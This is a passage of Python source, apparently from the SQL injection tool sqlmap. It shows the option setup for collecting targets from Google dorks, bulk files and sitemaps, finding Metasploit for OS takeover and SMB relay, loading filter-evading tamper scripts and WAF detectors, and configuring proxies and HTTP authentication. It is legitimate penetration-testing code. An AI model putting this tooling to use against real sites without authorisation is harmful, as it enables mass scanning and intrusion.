        return
    kb.data.onlyGETs = None
    def retrieve():
        # Fetch one page of dork results and queue the testable links
        links = search(conf.googleDork)
        if not links:
            errMsg = "unable to find results for your "
            errMsg += "search dork expression"
            raise SqlmapGenericException(errMsg)
        for link in links:
            link = urldecode(link)
            if re.search(r"(.*?)\?(.+)", link):
                kb.targets.add((link, conf.method, conf.data, conf.cookie, None))
            elif re.search(URI_INJECTABLE_REGEX, link, re.I):
                if kb.data.onlyGETs is None and conf.data is None and not conf.googleDork:
                    message = "do you want to scan only results containing GET parameters? [Y/n] "
                    kb.data.onlyGETs = readInput(message, default='Y', boolean=True)
                if not kb.data.onlyGETs or conf.googleDork:
                    kb.targets.add((link, conf.method, conf.data, conf.cookie, None))
        return links
    # Keep paging through results until at least one testable target is found
    while True:
        links = retrieve()
        if kb.targets:
            infoMsg = "sqlmap got %d results for your " % len(links)
            infoMsg += "search dork expression, "
            infoMsg += "all " if len(links) == len(kb.targets) else "%d " % len(kb.targets)
            infoMsg += "of them are testable targets"
            logger.info(infoMsg)
            break
        message = "sqlmap got %d results " % len(links)
        message += "for your search dork expression, but none of them "
        message += "have GET parameters to test for SQL injection. "
        message += "Do you want to skip to the next result page? [Y/n]"
        if not readInput(message, default='Y', boolean=True):
            raise SqlmapSilentQuitException
        conf.googlePage += 1
def _setBulkMultipleTargets():
    """Parse the bulk targets file and queue every usable (GET-parameter) URL."""
    if not conf.bulkFile:
        return
    conf.bulkFile = safeExpandUser(conf.bulkFile)
    logger.info("parsing multiple targets list from '%s'" % conf.bulkFile)
    if not os.path.isfile(conf.bulkFile):
        errMsg = "the specified bulk file "
        errMsg += "does not exist"
        raise SqlmapFilePathException(errMsg)
    found = False
    for line in getFileItems(conf.bulkFile):
        # Usable lines carry a query string or an explicit injection marker
        if re.match(r"[^ ]+\?(.+)", line, re.I) or CUSTOM_INJECTION_MARK_CHAR in line:
            found = True
            kb.targets.add((line.strip(), conf.method, conf.data, conf.cookie, None))
    if not found and not conf.forms and not conf.crawlDepth:
        logger.warn("no usable links found (with GET parameters)")
def _setSitemapTargets():
    """Parse the sitemap URL and queue every link carrying GET parameters."""
    if not conf.sitemapUrl:
        return
    logger.info("parsing sitemap '%s'" % conf.sitemapUrl)
    found = False
    for item in parseSitemap(conf.sitemapUrl):
        if re.match(r"[^ ]+\?(.+)", item, re.I):
            found = True
            kb.targets.add((item.strip(), None, None, None, None))
    if not found and not conf.forms and not conf.crawlDepth:
        logger.warn("no usable links found (with GET parameters)")
def _findPageForms():
    """
    Searches retrieved page(s) for HTML forms and registers them as targets
    (switch '--forms'). Skipped when crawling is active (forms are handled
    there) or when the initial connection check fails.
    """
    if not conf.forms or conf.crawlDepth:
        return

    if conf.url and not checkConnection():
        return

    infoMsg = "searching for forms"
    logger.info(infoMsg)

    if not any((conf.bulkFile, conf.googleDork, conf.sitemapUrl)):
        # Single-target mode: fetch the page for conf.url and parse its forms
        page, _, _ = Request.queryPage(content=True)
        findPageForms(page, conf.url, True, True)
    else:
        # Multiple-target mode: collect candidate URLs from the active source
        if conf.bulkFile:
            targets = getFileItems(conf.bulkFile)
        elif conf.sitemapUrl:
            targets = parseSitemap(conf.sitemapUrl)
        elif conf.googleDork:
            # Dork results were already stored in kb.targets; re-parse each
            # one for forms (hence the clear() afterwards)
            targets = [_[0] for _ in kb.targets]
            kb.targets.clear()

        # NOTE(review): assumes getFileItems()/parseSitemap() return indexable
        # sequences (len()/[] are used below) - verify against their definitions
        for i in xrange(len(targets)):
            try:
                target = targets[i]
                page, _, _ = Request.getPage(url=target.strip(), crawling=True, raise404=False)
                findPageForms(page, target, False, True)

                if conf.verbose in (1, 2):
                    status = '%d/%d links visited (%d%%)' % (i + 1, len(targets), round(100.0 * (i + 1) / len(targets)))
                    dataToStdout("\r[%s] [INFO] %s" % (time.strftime("%X"), status), True)
            except KeyboardInterrupt:
                # Ctrl-C stops the scan of remaining candidates
                break
            except Exception, ex:
                # Best-effort: a failing candidate is logged and skipped
                errMsg = "problem occurred while searching for forms at '%s' ('%s')" % (target, getSafeExString(ex))
                logger.error(errMsg)
def _setDBMSAuthentication():
    """
    Check and set the DBMS authentication credentials to run statements as
    another user, not the session user
    """
    if not conf.dbmsCred:
        return

    logger.debug("setting the DBMS authentication credentials")

    credentials = re.search("^(.+?):(.*?)$", conf.dbmsCred)

    if credentials is None:
        errMsg = "DBMS authentication credentials value must be in format "
        errMsg += "username:password"
        raise SqlmapSyntaxException(errMsg)

    conf.dbmsUsername, conf.dbmsPassword = credentials.group(1), credentials.group(2)
def _setMetasploit():
    """
    Validates and locates the Metasploit Framework installation needed by
    the takeover out-of-band switches (--os-pwn, --os-smb, --os-bof).
    Falls back to searching PATH when no valid --msf-path was given.
    """
    if not conf.osPwn and not conf.osSmb and not conf.osBof:
        return

    debugMsg = "setting the takeover out-of-band functionality"
    logger.debug(debugMsg)

    msfEnvPathExists = False

    if IS_WIN:
        # pywin32 is required on Windows for the takeover machinery
        try:
            import win32file
        except ImportError:
            errMsg = "sqlmap requires third-party module 'pywin32' "
            errMsg += "in order to use Metasploit functionalities on "
            errMsg += "Windows. You can download it from "
            errMsg += "'http://sourceforge.net/projects/pywin32/files/pywin32/'"
            raise SqlmapMissingDependence(errMsg)

        if not conf.msfPath:
            # Helper: read a value from a HKLM registry key (None on failure)
            def _(key, value):
                retVal = None

                try:
                    from _winreg import ConnectRegistry, OpenKey, QueryValueEx, HKEY_LOCAL_MACHINE
                    _ = ConnectRegistry(None, HKEY_LOCAL_MACHINE)
                    _ = OpenKey(_, key)
                    retVal = QueryValueEx(_, value)[0]
                except:
                    logger.debug("unable to identify Metasploit installation path via registry key")

                return retVal

            conf.msfPath = _(r"SOFTWARE\Rapid7\Metasploit", "Location")

            if conf.msfPath:
                conf.msfPath = os.path.join(conf.msfPath, "msf3")

    if conf.osSmb:
        # SMB relay attack needs to bind a listening TCP port
        isAdmin = runningAsAdmin()

        if not isAdmin:
            errMsg = "you need to run sqlmap as an administrator "
            errMsg += "if you want to perform a SMB relay attack because "
            errMsg += "it will need to listen on a user-specified SMB "
            errMsg += "TCP port for incoming connection attempts"
            raise SqlmapMissingPrivileges(errMsg)

    if conf.msfPath:
        # Accept either the given directory or its "bin" subdirectory;
        # presence of msfcli/msfconsole marks a candidate, and the payload
        # generators decide between old (msfencode/msfpayload) and new
        # (msfvenom) framework layouts
        for path in (conf.msfPath, os.path.join(conf.msfPath, "bin")):
            if any(os.path.exists(normalizePath(os.path.join(path, _))) for _ in ("msfcli", "msfconsole")):
                msfEnvPathExists = True

                if all(os.path.exists(normalizePath(os.path.join(path, _))) for _ in ("msfvenom",)):
                    kb.oldMsf = False
                elif all(os.path.exists(normalizePath(os.path.join(path, _))) for _ in ("msfencode", "msfpayload")):
                    kb.oldMsf = True
                else:
                    msfEnvPathExists = False

                conf.msfPath = path
                break

        if msfEnvPathExists:
            debugMsg = "provided Metasploit Framework path "
            debugMsg += "'%s' is valid" % conf.msfPath
            logger.debug(debugMsg)
        else:
            warnMsg = "the provided Metasploit Framework path "
            warnMsg += "'%s' is not valid. The cause could " % conf.msfPath
            warnMsg += "be that the path does not exists or that one "
            warnMsg += "or more of the needed Metasploit executables "
            warnMsg += "within msfcli, msfconsole, msfencode and "
            warnMsg += "msfpayload do not exist"
            logger.warn(warnMsg)
    else:
        warnMsg = "you did not provide the local path where Metasploit "
        warnMsg += "Framework is installed"
        logger.warn(warnMsg)

    if not msfEnvPathExists:
        # Fall back to scanning every directory in the PATH environment
        warnMsg = "sqlmap is going to look for Metasploit Framework "
        warnMsg += "installation inside the environment path(s)"
        logger.warn(warnMsg)

        envPaths = os.environ.get("PATH", "").split(";" if IS_WIN else ":")

        for envPath in envPaths:
            envPath = envPath.replace(";", "")

            if any(os.path.exists(normalizePath(os.path.join(envPath, _))) for _ in ("msfcli", "msfconsole")):
                msfEnvPathExists = True

                if all(os.path.exists(normalizePath(os.path.join(envPath, _))) for _ in ("msfvenom",)):
                    kb.oldMsf = False
                elif all(os.path.exists(normalizePath(os.path.join(envPath, _))) for _ in ("msfencode", "msfpayload")):
                    kb.oldMsf = True
                else:
                    msfEnvPathExists = False

                if msfEnvPathExists:
                    infoMsg = "Metasploit Framework has been found "
                    infoMsg += "installed in the '%s' path" % envPath
                    logger.info(infoMsg)

                    conf.msfPath = envPath

                    break

    if not msfEnvPathExists:
        errMsg = "unable to locate Metasploit Framework installation. "
        errMsg += "You can get it at 'http://www.metasploit.com/download/'"
        raise SqlmapFilePathException(errMsg)
def _setWriteFile():
    """
    Validates the file write options ('--file-write'/'--file-dest') and
    records the type of the local file to be written
    """
    if not conf.wFile:
        return

    logger.debug("setting the write file functionality")

    if not os.path.exists(conf.wFile):
        raise SqlmapFilePathException("the provided local file '%s' does not exist" % conf.wFile)

    if not conf.dFile:
        errMsg = "you did not provide the back-end DBMS absolute path "
        errMsg += "where you want to write the local file '%s'" % conf.wFile
        raise SqlmapMissingMandatoryOptionException(errMsg)

    conf.wFileType = getFileType(conf.wFile)
def _setOS():
    """
    Force the back-end DBMS operating system option.
    """
    if not conf.os:
        return

    if conf.os.lower() not in SUPPORTED_OS:
        supported = ', '.join(name.capitalize() for name in SUPPORTED_OS)
        errMsg = "you provided an unsupported back-end DBMS operating "
        errMsg += "system. The supported DBMS operating systems for OS "
        errMsg += "and file system access are %s. " % supported
        errMsg += "If you do not know the back-end DBMS underlying OS, "
        errMsg += "do not provide it and sqlmap will fingerprint it for "
        errMsg += "you."
        raise SqlmapUnsupportedDBMSException(errMsg)

    debugMsg = "forcing back-end DBMS operating system to user defined "
    debugMsg += "value '%s'" % conf.os
    logger.debug(debugMsg)

    Backend.setOs(conf.os)
def _setTechnique():
    """
    Translates the user supplied '--technique' letters (e.g. "BEU") into the
    list of corresponding PAYLOAD.TECHNIQUE enum values
    """
    validTechniques = sorted(getPublicTypeMembers(PAYLOAD.TECHNIQUE), key=lambda x: x[1])
    validLetters = [technique[0][0].upper() for technique in validTechniques]

    if conf.tech and isinstance(conf.tech, basestring):
        selected = []

        for letter in conf.tech.upper():
            if letter not in validLetters:
                errMsg = "value for --technique must be a string composed "
                errMsg += "by the letters %s. Refer to the " % ", ".join(validLetters)
                errMsg += "user's manual for details"
                raise SqlmapSyntaxException(errMsg)

            # map the letter back onto its technique's enum value
            for name, value in validTechniques:
                if name[0] == letter:
                    selected.append(value)
                    break

        conf.tech = selected
def _setDBMS():
    """
    Force the back-end DBMS option.
    """
    if not conf.dbms:
        return

    logger.debug("forcing back-end DBMS to user defined value")

    conf.dbms = conf.dbms.lower()

    # allow an optional trailing version, e.g. "mysql 5.0"
    match = re.search("(%s) ([\d\.]+)" % "|".join(SUPPORTED_DBMS), conf.dbms, re.I)

    if match:
        conf.dbms = match.group(1)
        Backend.setVersion(match.group(2))

    if conf.dbms not in SUPPORTED_DBMS:
        errMsg = "you provided an unsupported back-end database management "
        errMsg += "system. Supported DBMSes are as follows: %s. " % ', '.join(sorted(_ for _ in DBMS_DICT))
        errMsg += "If you do not know the back-end DBMS, do not provide "
        errMsg += "it and sqlmap will fingerprint it for you."
        raise SqlmapUnsupportedDBMSException(errMsg)

    # normalize any alias to its canonical DBMS name
    for dbms, aliases in DBMS_ALIASES:
        if conf.dbms in aliases:
            conf.dbms = dbms
            break
def _setTamperingFunctions():
    """
    Loads tampering functions from given script(s)
    """
    if conf.tamper:
        # Track declared __priority__ values to (optionally) reorder the
        # scripts when the user supplied them in a suspicious order
        last_priority = PRIORITY.HIGHEST
        check_priority = True
        resolve_priorities = False
        priorities = []

        for script in re.split(PARAMETER_SPLITTING_REGEX, conf.tamper):
            found = False

            path = paths.SQLMAP_TAMPER_PATH.encode(sys.getfilesystemencoding() or UNICODE_ENCODING)
            script = script.strip().encode(sys.getfilesystemencoding() or UNICODE_ENCODING)

            try:
                if not script:
                    continue
                # bare names resolve against the bundled tamper directory
                elif os.path.exists(os.path.join(path, script if script.endswith(".py") else "%s.py" % script)):
                    script = os.path.join(path, script if script.endswith(".py") else "%s.py" % script)
                elif not os.path.exists(script):
                    errMsg = "tamper script '%s' does not exist" % script
                    raise SqlmapFilePathException(errMsg)
                elif not script.endswith(".py"):
                    errMsg = "tamper script '%s' should have an extension '.py'" % script
                    raise SqlmapSyntaxException(errMsg)
            except UnicodeDecodeError:
                errMsg = "invalid character provided in option '--tamper'"
                raise SqlmapSyntaxException(errMsg)

            dirname, filename = os.path.split(script)
            dirname = os.path.abspath(dirname)

            infoMsg = "loading tamper script '%s'" % filename[:-3]
            logger.info(infoMsg)

            # the script's directory has to be an importable package
            if not os.path.exists(os.path.join(dirname, "__init__.py")):
                errMsg = "make sure that there is an empty file '__init__.py' "
                errMsg += "inside of tamper scripts directory '%s'" % dirname
                raise SqlmapGenericException(errMsg)

            if dirname not in sys.path:
                sys.path.insert(0, dirname)

            try:
                module = __import__(filename[:-3].encode(sys.getfilesystemencoding() or UNICODE_ENCODING))
            except (ImportError, SyntaxError), ex:
                raise SqlmapSyntaxException("cannot import tamper script '%s' (%s)" % (filename[:-3], getSafeExString(ex)))

            priority = PRIORITY.NORMAL if not hasattr(module, "__priority__") else module.__priority__

            for name, function in inspect.getmembers(module, inspect.isfunction):
                # a valid script exposes tamper(payload, **kwargs)
                if name == "tamper" and inspect.getargspec(function).args and inspect.getargspec(function).keywords == "kwargs":
                    found = True
                    kb.tamperFunctions.append(function)
                    function.func_name = module.__name__

                    # ask (once) whether to auto-sort scripts whose declared
                    # priority is higher than an already loaded one
                    if check_priority and priority > last_priority:
                        message = "it appears that you might have mixed "
                        message += "the order of tamper scripts. "
                        message += "Do you want to auto resolve this? [Y/n/q] "
                        choice = readInput(message, default='Y').upper()

                        if choice == 'N':
                            resolve_priorities = False
                        elif choice == 'Q':
                            raise SqlmapUserQuitException
                        else:
                            resolve_priorities = True

                        check_priority = False

                    priorities.append((priority, function))
                    last_priority = priority

                    break
                elif name == "dependencies":
                    # dependency check hook is executed immediately
                    function()

            if not found:
                errMsg = "missing function 'tamper(payload, **kwargs)' "
                errMsg += "in tamper script '%s'" % script
                raise SqlmapGenericException(errMsg)

        if kb.tamperFunctions and len(kb.tamperFunctions) > 3:
            warnMsg = "using too many tamper scripts is usually not "
            warnMsg += "a good idea"
            logger.warning(warnMsg)

        if resolve_priorities and priorities:
            # highest priority first
            priorities.sort(reverse=True)
            kb.tamperFunctions = []

            for _, function in priorities:
                kb.tamperFunctions.append(function)
def _setWafFunctions():
    """
    Loads WAF/IPS/IDS detecting functions from script(s)
    """
    if conf.identifyWaf:
        for found in glob.glob(os.path.join(paths.SQLMAP_WAF_PATH, "*.py")):
            dirname, filename = os.path.split(found)
            dirname = os.path.abspath(dirname)

            if filename == "__init__.py":
                continue

            debugMsg = "loading WAF script '%s'" % filename[:-3]
            logger.debug(debugMsg)

            if dirname not in sys.path:
                sys.path.insert(0, dirname)

            try:
                # drop any previously cached module of the same name so a
                # fresh copy is imported
                if filename[:-3] in sys.modules:
                    del sys.modules[filename[:-3]]
                module = __import__(filename[:-3].encode(sys.getfilesystemencoding() or UNICODE_ENCODING))
            except ImportError, msg:
                raise SqlmapSyntaxException("cannot import WAF script '%s' (%s)" % (filename[:-3], msg))

            _ = dict(inspect.getmembers(module))
            if "detect" not in _:
                errMsg = "missing function 'detect(get_page)' "
                errMsg += "in WAF script '%s'" % found
                raise SqlmapGenericException(errMsg)
            else:
                kb.wafFunctions.append((_["detect"], _.get("__product__", filename[:-3])))

        # generic detectors are pushed to the end (False sorts before True)
        kb.wafFunctions = sorted(kb.wafFunctions, key=lambda _: "generic" in _[1].lower())
def _setThreads():
    # fall back to a single thread on a missing or invalid '--threads' value
    conf.threads = conf.threads if isinstance(conf.threads, int) and conf.threads > 0 else 1
def _setDNSCache():
    """
    Makes a cached version of socket.getaddrinfo to avoid subsequent DNS requests.

    The original resolver is stashed once as socket._getaddrinfo (the
    hasattr() guard prevents double-wrapping on repeated invocations,
    e.g. inside --sqlmap-shell).
    """
    def _getaddrinfo(*args, **kwargs):
        # Fix: keyword arguments participate in the cache key too - with the
        # previous args-only key, calls differing solely in kwargs would
        # wrongly share a single cached resolution
        key = (args, frozenset(kwargs.items()))

        if key not in kb.cache.addrinfo:
            kb.cache.addrinfo[key] = socket._getaddrinfo(*args, **kwargs)

        return kb.cache.addrinfo[key]

    if not hasattr(socket, "_getaddrinfo"):
        socket._getaddrinfo = socket.getaddrinfo
        socket.getaddrinfo = _getaddrinfo
def _setSocketPreConnect():
    """
    Makes a pre-connect version of socket.connect

    A daemon thread keeps a small pool of already-connected sockets per
    (family, type, proto, address) key; the patched socket.connect() then
    reuses a pooled connection when a fresh one is available.
    """
    if conf.disablePrecon:
        return

    def _():
        # Background filler: tops up every known endpoint's queue until the
        # scan ends or pre-connect gets disabled
        while kb.get("threadContinue") and not conf.get("disablePrecon"):
            try:
                for key in socket._ready:
                    if len(socket._ready[key]) < SOCKET_PRE_CONNECT_QUEUE_SIZE:
                        family, type, proto, address = key
                        s = socket.socket(family, type, proto)
                        # _connect is the original (unpatched) connect
                        s._connect(address)
                        with kb.locks.socket:
                            socket._ready[key].append((s._sock, time.time()))
            except KeyboardInterrupt:
                break
            except:
                # best-effort: connection failures here are silently retried
                pass
            finally:
                time.sleep(0.01)

    def connect(self, address):
        # Replacement for socket.socket.connect: prefer a pooled, still-fresh
        # pre-connected socket; otherwise connect normally
        found = False
        key = (self.family, self.type, self.proto, address)
        with kb.locks.socket:
            if key not in socket._ready:
                socket._ready[key] = []

            while len(socket._ready[key]) > 0:
                candidate, created = socket._ready[key].pop(0)
                if (time.time() - created) < PRECONNECT_CANDIDATE_TIMEOUT:
                    self._sock = candidate
                    found = True
                    break
                else:
                    # stale candidate - discard it
                    try:
                        candidate.close()
                    except socket.error:
                        pass

        if not found:
            self._connect(address)

    # patch only once (guard against repeated calls)
    if not hasattr(socket.socket, "_connect"):
        socket._ready = {}
        socket.socket._connect = socket.socket.connect
        socket.socket.connect = connect

    thread = threading.Thread(target=_)
    setDaemon(thread)
    thread.start()
def _setHTTPHandlers():
    """
    Check and set the HTTP/SOCKS proxy for all HTTP requests, then (re)build
    and install the global urllib2 opener with all configured handlers.
    """
    global proxyHandler

    # remove handler methods possibly left over from a previous run
    for _ in ("http", "https"):
        if hasattr(proxyHandler, "%s_open" % _):
            delattr(proxyHandler, "%s_open" % _)

    if conf.proxyList is not None:
        # rotate through the supplied proxy list (consume the head entry)
        if not conf.proxyList:
            errMsg = "list of usable proxies is exhausted"
            raise SqlmapNoneDataException(errMsg)

        conf.proxy = conf.proxyList[0]
        conf.proxyList = conf.proxyList[1:]

        infoMsg = "loading proxy '%s' from a supplied proxy list file" % conf.proxy
        logger.info(infoMsg)
    elif not conf.proxy:
        if conf.hostname in ("localhost", "127.0.0.1") or conf.ignoreProxy:
            # local targets (or --ignore-proxy) bypass any system proxy
            proxyHandler.proxies = {}

    if conf.proxy:
        debugMsg = "setting the HTTP/SOCKS proxy for all HTTP requests"
        logger.debug(debugMsg)

        try:
            _ = urlparse.urlsplit(conf.proxy)
        except Exception, ex:
            errMsg = "invalid proxy address '%s' ('%s')" % (conf.proxy, getSafeExString(ex))
            raise SqlmapSyntaxException, errMsg

        hostnamePort = _.netloc.split(":")

        scheme = _.scheme.upper()
        hostname = hostnamePort[0]
        port = None
        username = None
        password = None

        if len(hostnamePort) == 2:
            try:
                port = int(hostnamePort[1])
            except:
                pass  # drops into the next check block

        if not all((scheme, hasattr(PROXY_TYPE, scheme), hostname, port)):
            errMsg = "proxy value must be in format '(%s)://address:port'" % "|".join(_[0].lower() for _ in getPublicTypeMembers(PROXY_TYPE))
            raise SqlmapSyntaxException(errMsg)

        if conf.proxyCred:
            _ = re.search("^(.*?):(.*?)$", conf.proxyCred)
            if not _:
                errMsg = "proxy authentication credentials "
                errMsg += "value must be in format username:password"
                raise SqlmapSyntaxException(errMsg)
            else:
                username = _.group(1)
                password = _.group(2)

        if scheme in (PROXY_TYPE.SOCKS4, PROXY_TYPE.SOCKS5):
            # SOCKS proxying is done by wrapping urllib2's socket module
            proxyHandler.proxies = {}

            socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5 if scheme == PROXY_TYPE.SOCKS5 else socks.PROXY_TYPE_SOCKS4, hostname, port, username=username, password=password)
            socks.wrapmodule(urllib2)
        else:
            socks.unwrapmodule(urllib2)

            if conf.proxyCred:
                # Reference: http://stackoverflow.com/questions/34079/how-to-specify-an-authenticated-proxy-for-a-python-http-connection
                proxyString = "%s@" % conf.proxyCred
            else:
                proxyString = ""

            proxyString += "%s:%d" % (hostname, port)
            proxyHandler.proxies = {"http": proxyString, "https": proxyString}

        proxyHandler.__init__(proxyHandler.proxies)

    debugMsg = "creating HTTP requests opener object"
    logger.debug(debugMsg)

    handlers = filter(None, [multipartPostHandler, proxyHandler if proxyHandler.proxies else None, authHandler, redirectHandler, rangeHandler, httpsHandler])

    if not conf.dropSetCookie:
        if not conf.loadCookies:
            conf.cj = cookielib.CookieJar()
        else:
            conf.cj = cookielib.MozillaCookieJar()
            resetCookieJar(conf.cj)

        handlers.append(urllib2.HTTPCookieProcessor(conf.cj))

    # Reference: http://www.w3.org/Protocols/rfc2616/rfc2616-sec8.html
    if conf.keepAlive:
        warnMsg = "persistent HTTP(s) connections, Keep-Alive, has "
        warnMsg += "been disabled because of its incompatibility "

        if conf.proxy:
            warnMsg += "with HTTP(s) proxy"
            logger.warn(warnMsg)
        elif conf.authType:
            warnMsg += "with authentication methods"
            logger.warn(warnMsg)
        else:
            handlers.append(keepAliveHandler)

    opener = urllib2.build_opener(*handlers)
    urllib2.install_opener(opener)
def _setSafeVisit():
    """
    Check and set the safe visit options.

    Either parses a raw HTTP request file ('--safe-req') into kb.safeReq
    (method, url, headers, post) or normalizes the '--safe-url' value.
    """
    if not any((conf.safeUrl, conf.safeReqFile)):
        return

    if conf.safeReqFile:
        checkFile(conf.safeReqFile)

        raw = readCachedFileContent(conf.safeReqFile)
        # first line must be a request line, e.g. "GET /path HTTP/1.1"
        match = re.search(r"\A([A-Z]+) ([^ ]+) HTTP/[0-9.]+\Z", raw[:raw.find('\n')])

        if match:
            kb.safeReq.method = match.group(1)
            kb.safeReq.url = match.group(2)
            kb.safeReq.headers = {}

            for line in raw[raw.find('\n') + 1:].split('\n'):
                line = line.strip()
                if line and ':' in line:
                    key, value = line.split(':', 1)
                    value = value.strip()
                    kb.safeReq.headers[key] = value
                    if key == HTTP_HEADER.HOST:
                        # turn a Host header into an absolute URL base
                        if not value.startswith("http"):
                            scheme = "http"
                            if value.endswith(":443"):
                                scheme = "https"
                            value = "%s://%s" % (scheme, value)
                        kb.safeReq.url = urlparse.urljoin(value, kb.safeReq.url)
                else:
                    # first non-header line ends the header section
                    break

            # body starts after the first blank line (CRLF or LF style)
            post = None

            if '\r\n\r\n' in raw:
                post = raw[raw.find('\r\n\r\n') + 4:]
            elif '\n\n' in raw:
                post = raw[raw.find('\n\n') + 2:]

            if post and post.strip():
                kb.safeReq.post = post
            else:
                kb.safeReq.post = None
        else:
            errMsg = "invalid format of a safe request file"
            raise SqlmapSyntaxException, errMsg
    else:
        # prepend a scheme when missing (":443" implies https)
        if not re.search("^http[s]*://", conf.safeUrl):
            if ":443/" in conf.safeUrl:
                conf.safeUrl = "https://" + conf.safeUrl
            else:
                conf.safeUrl = "http://" + conf.safeUrl

    if conf.safeFreq <= 0:
        errMsg = "please provide a valid value (>0) for safe frequency (--safe-freq) while using safe visit features"
        raise SqlmapSyntaxException(errMsg)
def _setPrefixSuffix():
    """
    Builds a single custom boundary from user supplied '--prefix' and
    '--suffix' values; when both are given, no other boundaries are tested
    """
    if conf.prefix is None or conf.suffix is None:
        return

    # Create a custom boundary object for user's supplied prefix and suffix
    boundary = AttribDict()

    boundary.level = 1
    boundary.clause = [0]
    boundary.where = [1, 2, 3]
    boundary.prefix = conf.prefix
    boundary.suffix = conf.suffix

    lowered = boundary.suffix.lower()

    # NOTE: when " like" is present without any quote character, ptype is
    # deliberately left unset (mirrors the original selection logic)
    if " like" in lowered:
        if "'" in lowered:
            boundary.ptype = 3
        elif '"' in lowered:
            boundary.ptype = 5
    elif "'" in boundary.suffix:
        boundary.ptype = 2
    elif '"' in boundary.suffix:
        boundary.ptype = 4
    else:
        boundary.ptype = 1

    # user who provides --prefix/--suffix does not want other boundaries
    # to be tested for
    conf.boundaries = [boundary]
def _setAuthCred():
    """
    Adds authentication credentials (if any) for current target to the password manager
    (used by connection handler)
    """
    required = (conf.scheme, conf.hostname, conf.port, conf.authUsername, conf.authPassword)

    if kb.passwordMgr and not any(value is None for value in required):
        uri = "%s://%s:%d" % (conf.scheme, conf.hostname, conf.port)
        kb.passwordMgr.add_password(None, uri, conf.authUsername, conf.authPassword)
def _setHTTPAuthentication():
    """
    Check and set the HTTP(s) authentication method (Basic, Digest, NTLM or PKI),
    username and password for first three methods, or PEM private key file for
    PKI authentication
    """
    global authHandler

    if not conf.authType and not conf.authCred and not conf.authFile:
        return

    # a key file alone implies PKI authentication
    if conf.authFile and not conf.authType:
        conf.authType = AUTH_TYPE.PKI

    elif conf.authType and not conf.authCred and not conf.authFile:
        errMsg = "you specified the HTTP authentication type, but "
        errMsg += "did not provide the credentials"
        raise SqlmapSyntaxException(errMsg)

    elif not conf.authType and conf.authCred:
        errMsg = "you specified the HTTP authentication credentials, "
        errMsg += "but did not provide the type"
        raise SqlmapSyntaxException(errMsg)

    elif (conf.authType or "").lower() not in (AUTH_TYPE.BASIC, AUTH_TYPE.DIGEST, AUTH_TYPE.NTLM, AUTH_TYPE.PKI):
        errMsg = "HTTP authentication type value must be "
        errMsg += "Basic, Digest, NTLM or PKI"
        raise SqlmapSyntaxException(errMsg)

    if not conf.authFile:
        debugMsg = "setting the HTTP authentication type and credentials"
        logger.debug(debugMsg)

        authType = conf.authType.lower()

        # pick the credential format (and matching error message) per type
        if authType in (AUTH_TYPE.BASIC, AUTH_TYPE.DIGEST):
            regExp = "^(.*?):(.*?)$"
            errMsg = "HTTP %s authentication credentials " % authType
            errMsg += "value must be in format 'username:password'"
        elif authType == AUTH_TYPE.NTLM:
            regExp = "^(.*\\\\.*):(.*?)$"
            errMsg = "HTTP NTLM authentication credentials value must "
            errMsg += "be in format 'DOMAIN\username:password'"
        elif authType == AUTH_TYPE.PKI:
            # PKI needs a key file, not inline credentials
            errMsg = "HTTP PKI authentication require "
            errMsg += "usage of option `--auth-pki`"
            raise SqlmapSyntaxException(errMsg)

        aCredRegExp = re.search(regExp, conf.authCred)

        if not aCredRegExp:
            raise SqlmapSyntaxException(errMsg)

        conf.authUsername = aCredRegExp.group(1)
        conf.authPassword = aCredRegExp.group(2)

        kb.passwordMgr = urllib2.HTTPPasswordMgrWithDefaultRealm()

        _setAuthCred()

        if authType == AUTH_TYPE.BASIC:
            authHandler = SmartHTTPBasicAuthHandler(kb.passwordMgr)

        elif authType == AUTH_TYPE.DIGEST:
            authHandler = urllib2.HTTPDigestAuthHandler(kb.passwordMgr)

        elif authType == AUTH_TYPE.NTLM:
            try:
                from ntlm import HTTPNtlmAuthHandler
            except ImportError:
                errMsg = "sqlmap requires Python NTLM third-party library "
                errMsg += "in order to authenticate via NTLM, "
                errMsg += "http://code.google.com/p/python-ntlm/"
                raise SqlmapMissingDependence(errMsg)

            authHandler = HTTPNtlmAuthHandler.HTTPNtlmAuthHandler(kb.passwordMgr)
    else:
        debugMsg = "setting the HTTP(s) authentication PEM private key"
        logger.debug(debugMsg)

        _ = safeExpandUser(conf.authFile)
        checkFile(_)
        authHandler = HTTPSPKIAuthHandler(_)
def _setHTTPExtraHeaders():
    """
    Parses user supplied extra HTTP headers ('--headers') into
    conf.httpHeaders, or appends sensible defaults when none were given
    """
    if conf.headers:
        logger.debug("setting extra HTTP headers")

        # headers may be separated by real or escaped newlines
        delimiter = "\n" if "\n" in conf.headers else "\\n"
        conf.headers = conf.headers.split(delimiter)

        for item in conf.headers:
            if not item.strip():
                continue

            if ':' not in item:
                errMsg = "invalid header value: %s. Valid header format is 'name:value'" % repr(item).lstrip('u')
                raise SqlmapSyntaxException(errMsg)

            name, value = [part.lstrip() for part in item.split(":", 1)]

            if name and value:
                conf.httpHeaders.append((name, value))

    elif not conf.requestFile and len(conf.httpHeaders or []) < 2:
        if conf.charset:
            conf.httpHeaders.append((HTTP_HEADER.ACCEPT_CHARSET, "%s;q=0.7,*;q=0.1" % conf.charset))

        # Invalidating any caching mechanism in between
        # Reference: http://stackoverflow.com/a/1383359
        conf.httpHeaders.append((HTTP_HEADER.CACHE_CONTROL, "no-cache"))
def _defaultHTTPUserAgent():
    """
    @return: default sqlmap HTTP User-Agent header
    @rtype: C{str}
    """
    return "{0} ({1})".format(VERSION_STRING, SITE)
def _setHTTPUserAgent():
    """
    Set the HTTP User-Agent header.
    Depending on the user options it can be:

        * The default sqlmap string
        * A default value read as user option
        * A random value read from a list of User-Agent headers from a
          file chosen as user option
    """
    if conf.mobile:
        # interactive pick from the known smartphone User-Agent values
        message = "which smartphone do you want sqlmap to imitate "
        message += "through HTTP User-Agent header?\n"
        items = sorted(getPublicTypeMembers(MOBILES, True))

        for count in xrange(len(items)):
            item = items[count]
            message += "[%d] %s%s\n" % (count + 1, item[0], " (default)" if item == MOBILES.IPHONE else "")

        test = readInput(message.rstrip('\n'), default=items.index(MOBILES.IPHONE) + 1)

        try:
            item = items[int(test) - 1]
        except:
            # anything unparsable falls back to the default choice
            item = MOBILES.IPHONE

        conf.httpHeaders.append((HTTP_HEADER.USER_AGENT, item[1]))

    elif conf.agent:
        debugMsg = "setting the HTTP User-Agent header"
        logger.debug(debugMsg)

        conf.httpHeaders.append((HTTP_HEADER.USER_AGENT, conf.agent))

    elif not conf.randomAgent:
